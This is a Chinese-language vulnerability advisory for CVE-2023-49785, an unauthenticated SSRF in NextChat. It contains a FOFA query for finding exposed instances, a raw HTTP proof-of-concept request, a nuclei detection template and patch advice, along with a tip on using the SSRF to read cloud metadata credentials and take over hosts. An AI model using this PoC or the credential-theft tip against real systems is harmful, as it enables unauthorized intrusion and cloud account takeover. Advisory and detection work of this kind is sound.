漏洞描述
NextChat 是一个面向用户的GPT类应用程序,用户可以通过这个程序与GPT进行交互。2024年3月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。
tips:结合云主机的特点,可通过ssrf访问云主机元数据,例如读取AK/SK,实现云主机接管。
产品界面
fofa语法
title="NextChat"
POC
GET /api/cors/https/www.baidu.com HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
nuclei验证
id: CVE-2023-49785
info:
name: NextChat cors SSRF漏洞 (CVE-2023-49785)
author: nobody
severity: high
description: |
NextChat 是一个面向用户的GPT类应用程序,用户可以通过这个程序与GPT进行交互。
2024年3月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在
无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。
impact: |
攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等.
remediation: |
升级版本,打补丁
metadata:
verified: true
max-request: 3
fofa-query: title="NextChat"
tags: ai,gpt,nextchat,ssrf
修复建议
建议升级到最新版本或打补丁
非必要禁止公网访问或白名单访问
requests:
- raw:
- |
GET /api/cors/https/www.baidu.com HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0
Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
matchers:
- type: dsl
dsl:
- status_code == 200 && contains_all(body,"京ICP证030173
号")
修复建议
- 建议升级到最新版本或打补丁
- 非必要禁止公网访问或白名单访问
-
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。